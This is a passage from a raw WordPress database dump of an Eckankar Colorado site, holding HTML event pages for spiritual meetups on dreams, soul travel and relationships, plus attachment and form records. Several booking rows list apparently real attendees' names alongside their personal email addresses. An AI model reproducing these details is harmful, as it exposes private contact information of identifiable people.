class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/294376285/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','From Mindfulness to Soulfulness','','publish','closed','closed','','from-mindfulness-to-soulfulness','','','2023-07-01 10:26:23','2023-07-01 16:26:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268765',0,'mec-events','',0),(268766,15,'2023-07-01 10:19:12','2023-07-01 16:19:12','','Flower2','','inherit','closed','closed','','flower2','','','2023-07-01 10:19:12','2023-07-01 16:19:12','',268765,'https://eckankar-colorado.org/wp-content/uploads/2023/07/Flower2.webp',0,'attachment','image/webp',0),(268767,0,'2023-07-02 09:57:30','2023-07-02 15:57:30','','','','publish','closed','closed','','268767','','','2023-07-02 09:57:30','2023-07-02 15:57:30','',0,'https://eckankar-colorado.org/nf_sub/268767/',0,'nf_sub','',0),(268768,1000089,'2023-07-02 10:30:00','2023-07-02 16:30:00','','Jack Lile - bluehuuron@yahoo.com','','publish','closed','closed','','jack-lile-bluehuuronyahoo-com','','','2023-07-02 10:30:00','2023-07-02 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268768',0,'mec-books','',0),(268769,1000090,'2023-07-02 10:30:00','2023-07-02 16:30:00','','Dirk - dkolter@gmx.net','','publish','closed','closed','','dirk-dkoltergmx-net','','','2023-07-02 10:30:00','2023-07-02 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268769',0,'mec-books','',0),(268871,15,'2023-08-04 07:18:33','2023-08-04 13:18:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\"><span style=\"font-size: 18pt;\">Explore Spiritual Dreams to Gain Valuable Insights</span><br>\r\n</span></strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Join us for an enlightening journey of exploring spiritual dreams to gain valuable insights into your everyday life.</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">Would you like to know how remembering your dreams can help you?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Are you interested in tools to remember and interpret your dreams?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you like to understand how dreams can enhance your spiritual growth?</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will discuss ways to remember and interpret your dreams and try a couple techniques to help you understand what is happening in your own inner worlds. Our goal is that each person will see the value of exploring dream worlds to gain spiritual insights.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book, ECK Wisdom on Dreams, p.1, “Why do we dream? Why is it important to dream? Because dreaming comes from the creative imagination, which is God’s gift to you and me. It is the nature of immortal Soul to dream. This is why your dreams, both in everyday life and while asleep are so important.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us in a 6-month spiritual discussion on past lives, dreams, and soul travel. We will meet on the 2nd Wednesday of the month at 6:30pm at the Parker Public Library. Free books will be available and there is no need to have the books ahead of time. You can join one of the classes or all of them.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The plan is to focus on a different aspect of these topics each month:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">May 10 - You Have Lived Before - Remembering Past Lives</span><br>\r\n<span style=\"font-size: 14pt;\">June 14 - Past Lives, Present Lessons</span><br>\r\n<span style=\"font-size: 14pt;\">July 12 - Your Source for Everyday Guidance: A Spiritual View of Dreams</span><br>\r\n<span style=\"font-size: 14pt;\">August 9 - Gaining Insights through Spiritual Dream Exploration</span><br>\r\n<span style=\"font-size: 14pt;\">September 13 - Soul Travel: Learn to Shift Your Consciousness for a Better Life</span><br>\r\n<span style=\"font-size: 14pt;\">October 11 - Beyond Soul Travel: Being, Knowing, and Seeing</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/295214343/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Gaining Insights through Spiritual Dream Exploration','','publish','closed','closed','','awaken-to-higher-consciousness-709','','','2023-08-04 07:18:33','2023-08-04 13:18:33','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268871',0,'mec-events','',0),(268770,2,'2023-07-04 03:31:45','2023-07-04 09:31:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 71px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\">[ninja_form id=62]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ninja Forms- EMAIL TESTS ONLY!!!!!','','publish','closed','closed','','ninja-forms-email-tests-only','','','2023-07-04 10:31:27','2023-07-04 16:31:27','',0,'https://eckankar-colorado.org/?page_id=268770',0,'page','',0),(268772,2,'2023-07-04 03:33:18','2023-07-04 09:33:18','','','','publish','closed','closed','','268772','','','2023-07-04 03:33:18','2023-07-04 09:33:18','',0,'https://eckankar-colorado.org/nf_sub/268772/',0,'nf_sub','',0),(268776,2,'2023-07-04 10:33:15','2023-07-04 16:33:15','','','','publish','closed','closed','','268776','','','2023-07-04 10:33:15','2023-07-04 16:33:15','',0,'https://eckankar-colorado.org/nf_sub/268776/',0,'nf_sub','',0),(268777,2,'2023-07-04 11:20:57','2023-07-04 17:20:57','','','','publish','closed','closed','','268777','','','2023-07-04 11:20:57','2023-07-04 17:20:57','',0,'https://eckankar-colorado.org/nf_sub/268777/',0,'nf_sub','',0),(268778,2,'2023-07-04 21:09:03','2023-07-05 03:09:03','','','','publish','closed','closed','','268778','','','2023-07-04 21:09:03','2023-07-05 03:09:03','',0,'https://eckankar-colorado.org/nf_sub/268778/',0,'nf_sub','',0),(268779,2,'2023-07-04 21:37:38','2023-07-05 03:37:38','','','','publish','closed','closed','','268779','','','2023-07-04 21:37:38','2023-07-05 03:37:38','',0,'https://eckankar-colorado.org/nf_sub/268779/',0,'nf_sub','',0),(268780,2,'2023-07-04 21:47:43','2023-07-05 03:47:43','','','','publish','closed','closed','','268780','','','2023-07-04 21:47:43','2023-07-05 03:47:43','',0,'https://eckankar-colorado.org/nf_sub/268780/',0,'nf_sub','',0),(268781,0,'2023-07-05 04:12:20','2023-07-05 10:12:20','','','','publish','closed','closed','','268781','','','2023-07-05 04:12:20','2023-07-05 10:12:20','',0,'https://eckankar-colorado.org/nf_sub/268781/',0,'nf_sub','',0),(268785,1000076,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Shannon Everett - shannon.everett2018@outlook.com','','publish','closed','closed','','shannon-everett-shannon-everett2018outlook-com-2','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268785',0,'mec-books','',0),(268786,1000023,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Bonnie Greenstreet  - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-8','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268786',0,'mec-books','',0),(268787,1000022,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Jorge  - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-jiuuumalukgmail-com','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268787',0,'mec-books','',0),(268788,1000061,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Chukwuebuka Okwor - ocekenedili@yahoo.com','','publish','closed','closed','','chukwuebuka-okwor-ocekenediliyahoo-com','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268788',0,'mec-books','',0),(268789,1000024,'2023-07-09 10:30:00','2023-07-09 16:30:00','','Roger  Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net-6','','','2023-07-09 10:30:00','2023-07-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268789',0,'mec-books','',0),(269352,2,'2023-11-04 11:33:04','2023-11-04 17:33:04','<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 30px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','NEW HOME PAGE VIDEO Code --11/3/2023','','publish','closed','closed','','new-home-page-video-code-11-3-2023','','','2023-11-04 11:43:53','2023-11-04 17:43:53','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=269352',0,'bg_block','',0),(268824,2,'2023-07-25 14:41:04','2023-07-25 20:41:04','','init-esa-confirmation-blue-2','','inherit','closed','closed','','init-esa-confirmation-blue-2','','','2023-07-25 14:41:04','2023-07-25 20:41:04','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/07/init-esa-confirmation-blue-2.jpg',0,'attachment','image/jpeg',0),(268826,2,'2023-07-25 21:08:57','2023-07-26 03:08:57','','login-bk-8','','inherit','closed','closed','','login-bk-8','','','2023-07-25 21:08:57','2023-07-26 03:08:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/07/login-bk-8.jpg',0,'attachment','image/jpeg',0),(268827,2,'2023-07-27 10:32:07','2023-07-27 16:32:07','','orange-bk-4','','inherit','closed','closed','','orange-bk-4','','','2023-07-27 10:32:07','2023-07-27 16:32:07','',268811,'https://eckankar-colorado.org/wp-content/uploads/2023/07/orange-bk-4.jpg',0,'attachment','image/jpeg',0),(268828,2,'2023-07-27 10:32:08','2023-07-27 16:32:08','','creamy-orange-bk-2','','inherit','closed','closed','','creamy-orange-bk-2','','','2023-07-27 10:32:08','2023-07-27 16:32:08','',268811,'https://eckankar-colorado.org/wp-content/uploads/2023/07/creamy-orange-bk-2.jpg',0,'attachment','image/jpeg',0),(268797,15,'2023-07-16 17:44:23','2023-07-16 23:44:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">The Divine Language of the Light and Sound</span></strong></span></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Yes, God speaks to you!</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This voice, the Light and Sound of God, can be seen, heard, and felt.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Dreams, intuition, gratitude, the love we have for our families—all reflect this life-giving creative power.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For millennia, religions have tried to express the Light and Sound of God through architecture and design, music and chanting, fire and song.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you appreciate beauty in nature, art, or music? Find solace in a sunrise? Love the sound of the rain?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>You can attune yourself to this divine, creative, transformative love</strong>&nbsp;and experience the Light and Sound at any time.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This free event is sponsored by Eckankar, the Path of Spiritual Freedom as a community service, a spiritual resource for people of all faiths and beliefs. It is an individual, creative practice to experience our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To read more about Light and Sound:&nbsp; </span><span style=\"font-size: 14pt;\"><a href=\"https://www.eckankar.org/experience/light-and-sound/\">Experience the Light &amp; Sound</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/294724792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','How to Experience God’s Love','','publish','closed','closed','','how-to-experience-gods-love','','','2023-07-16 17:44:23','2023-07-16 23:44:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268797',0,'mec-events','',0),(268798,15,'2023-07-16 17:40:06','2023-07-16 23:40:06','','StairwaytoGod','','inherit','closed','closed','','stairwaytogod','','','2023-07-16 17:40:06','2023-07-16 23:40:06','',268797,'https://eckankar-colorado.org/wp-content/uploads/2023/07/StairwaytoGod.webp',0,'attachment','image/webp',0),(268870,0,'2023-08-03 15:12:37','2023-08-03 21:12:37','','','','publish','closed','closed','','268870','','','2023-08-03 15:12:37','2023-08-03 21:12:37','',0,'https://eckankar-colorado.org/nf_sub/268870/',0,'nf_sub','',0),(269365,0,'2023-11-04 17:35:50','2023-11-04 23:35:50','','','','publish','closed','closed','','269365','','','2023-11-04 17:35:50','2023-11-04 23:35:50','',0,'https://eckankar-colorado.org/nf_sub/269365/',0,'nf_sub','',0),(269382,0,'2023-11-13 17:11:57','2023-11-14 00:11:57','','','','publish','closed','closed','','269382','','','2023-11-13 17:11:57','2023-11-14 00:11:57','',0,'https://eckankar-colorado.org/nf_sub/269382/',0,'nf_sub','',0),(269383,0,'2023-11-13 20:04:23','2023-11-14 03:04:23','','','','publish','closed','closed','','269383','','','2023-11-13 20:04:23','2023-11-14 03:04:23','',0,'https://eckankar-colorado.org/nf_sub/269383/',0,'nf_sub','',0),(269384,0,'2023-11-14 17:38:46','2023-11-15 00:38:46','','','','publish','closed','closed','','269384','','','2023-11-14 17:38:46','2023-11-15 00:38:46','',0,'https://eckankar-colorado.org/nf_sub/269384/',0,'nf_sub','',0),(269385,0,'2023-11-15 07:50:26','2023-11-15 14:50:26','','','','publish','closed','closed','','269385','','','2023-11-15 07:50:26','2023-11-15 14:50:26','',0,'https://eckankar-colorado.org/nf_sub/269385/',0,'nf_sub','',0),(269387,2,'2023-11-16 17:06:24','2023-11-17 00:06:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\r\n</span></strong></p>\r\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"color: #ad7f14;\"><strong><span style=\"font-size: 16pt;\">Featured Events Include:</span></strong></p>\r\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\r\n	<li><span style=\"font-size: 14pt;\">The keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\r\n	<li><span style=\"font-size: 14pt;\">All main-stage talks and performances; and</span></li>\r\n	<li><span style=\"font-size: 14pt;\">The 2023 digital Spiritual Art Gallery.</span></li>\r\n</ul>\r\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\r\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Power of Grace: A Secret to Spiritual Living','','draft','closed','closed','','the-power-of-grace-a-secret-to-spiritual-living','','','2023-11-17 11:08:10','2023-11-17 18:08:10','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269387',0,'mec-events','',0),(269388,2,'2023-11-16 17:03:25','2023-11-17 00:03:25','','power-of-grace-streaming-1','','inherit','closed','closed','','power-of-grace-streaming-1','','','2023-11-16 17:03:25','2023-11-17 00:03:25','',269387,'https://eckankar-colorado.org/wp-content/uploads/2023/11/power-of-grace-streaming-1.jpg',0,'attachment','image/jpeg',0),(269389,2,'2023-11-16 17:09:58','2023-11-17 00:09:58','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #ad7f14;\"><span style=\"font-size: 20pt;\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</span><br>\n</span></strong></p>\n<p class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-top: 0em; margin-top: -10px;\"><strong><span style=\"font-size: 18pt;\">Now streaming through January 31, 2024.</span></strong></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\" style=\"color: #ad7f14;\"><strong><span style=\"font-size: 16pt;\">Featured Events Include:</span></strong></p>\n<ul class=\"\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -10px;\">\n	<li><span style=\"font-size: 14pt;\">the keynote talk, Grateful for ECK and the Teacher Too! by Sri Harold Klemp, the spiritual leader of ECKANKAR;</span></li>\n	<li><span style=\"font-size: 14pt;\">all main-stage talks and performances; and</span></li>\n	<li><span style=\"font-size: 14pt;\">the 2023 digital Spiritual Art Gallery.</span></li>\n</ul>\n<p class=\"\" style=\"color: #ad7a05;\"><strong><span style=\"font-size: 16pt;\">EXTRAS!</span></strong></p>\n<ul class=\"\">\n	<li><span style=\"font-size: 14pt;\">NEW episode of the ECKANKAR Soul Adventure Podcast—Animals Are Souls Too: A Heartwarming Goose Tale.</span></li>\n	<li><span style=\"font-size: 14pt;\">ECK Soul Adventure Magazine—How Do We Soul Travel?</span></li>\n	<li><span style=\"font-size: 14pt;\">Youth and Family Adventures—A fun page of engaging videos and activities for youth and families.</span></li>\n</ul>\n<p class=\"\"><span style=\"font-size: 14pt;\">The highlight of the seminar is the opportunity to hear Sri Harold, the <span style=\"font-variant: small-caps;\"> Mahanta</span>, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Take your next spiritual step today. Your life can truly be a Soul Adventure!</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">For more information and to register, please visit</span></p>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><em>New to ECK? Guests register free!</em></span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\"><a class=\"meetupreg\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener noreferrer\">Get More Information and Register Now!</a></span></p>\n</div>\n</div>\n</div>\n</div>','The Power of Grace: A Secret to Spiritual Living','','inherit','closed','closed','','269387-autosave-v1','','','2023-11-16 17:09:58','2023-11-17 00:09:58','',269387,'https://eckankar-colorado.org/?p=269389',0,'revision','',0),(269409,2,'2023-11-20 14:01:41','2023-11-20 21:01:41','{\n    \"nav_menu_item[7245]\": {\n        \"value\": false,\n        \"type\": \"nav_menu_item\",\n        \"user_id\": 2,\n        \"date_modified_gmt\": \"2023-11-20 21:01:41\"\n    },\n    \"nav_menu_item[7248]\": {\n        \"value\": false,\n        \"type\": \"nav_menu_item\",\n        \"user_id\": 2,\n        \"date_modified_gmt\": \"2023-11-20 21:01:41\"\n    },\n    \"nav_menu_item[267112]\": {\n        \"value\": false,\n        \"type\": \"nav_menu_item\",\n        \"user_id\": 2,\n        \"date_modified_gmt\": \"2023-11-20 21:01:41\"\n    },\n    \"nav_menu_item[267121]\": {\n        \"value\": false,\n        \"type\": \"nav_menu_item\",\n        \"user_id\": 2,\n        \"date_modified_gmt\": \"2023-11-20 21:01:41\"\n    }\n}','','','trash','closed','closed','','495d16f7-bf9f-4ad5-91fb-c00bddd2ab5c','','','2023-11-20 14:01:41','2023-11-20 21:01:41','',0,'https://eckankar-colorado.org/495d16f7-bf9f-4ad5-91fb-c00bddd2ab5c/',0,'customize_changeset','',0),(269391,15,'2023-11-17 07:32:15','0000-00-00 00:00:00','','Auto Draft','','auto-draft','closed','closed','','','','','2023-11-17 07:32:15','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?p=269391',0,'post','',0),(269392,15,'2023-11-17 07:59:19','2023-11-17 14:59:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Keys to Better Relationships<br>\r\n</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to better relationships with everyone in your life.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“You are soul.&nbsp; </span><span style=\"font-size: 14pt;\">Learn your purpose in life, which is to become a vehicle for this divine love”</span><br>\r\n<span style=\"font-size: 14pt;\">— Sri Harold Klemp, \'<em>ECK Wisdom on Relationships</em>\' p. 27</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\r\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this lively discussion about the&nbsp;<em>Spiritual</em>&nbsp;side of&nbsp;<em>Relationships</em>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-----------------------------------------------------------------------------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">The \'<em>ECK Wisdom on Relationships</em>\' booklet is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span><br>\r\n<span style=\"font-size: 14pt;\">It is described and available for purchase at the link below.&nbsp;</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Relationships-75-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Wisdom on Relationships</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 68 pages -&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir-Wsdm-Relationships_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Table of Contents</a>)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp Shares Wisdom on Relationships:</span><br>\r\n<a href=\"https://www.youtube.com/watch?v=5eUV2iVYjn0\"><span style=\"font-size: 14pt;\">How to Become a Magnet for Love</span></a><br>\r\n<span style=\"font-size: 14pt;\">05:18 - YouTube</span><br>\r\n<span style=\"font-size: 14pt;\">This clip is from Harold Klemp\'s 2010 talk</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Blog:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://eckankarblog.org/category/relationships/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR BLOG - Relationships Category</a></span><br>\r\n<span style=\"font-size: 14pt;\">Articles to answer your spiritual questions and inspire you to lead the most fulfilling of lives.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, January 3rd at 7:00 p.m.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by </span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><a class=\"meetupreg\" style=\"background-color: #ffffff;\" href=\"https://www.meetup.com/segofaurora/events/296819662/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 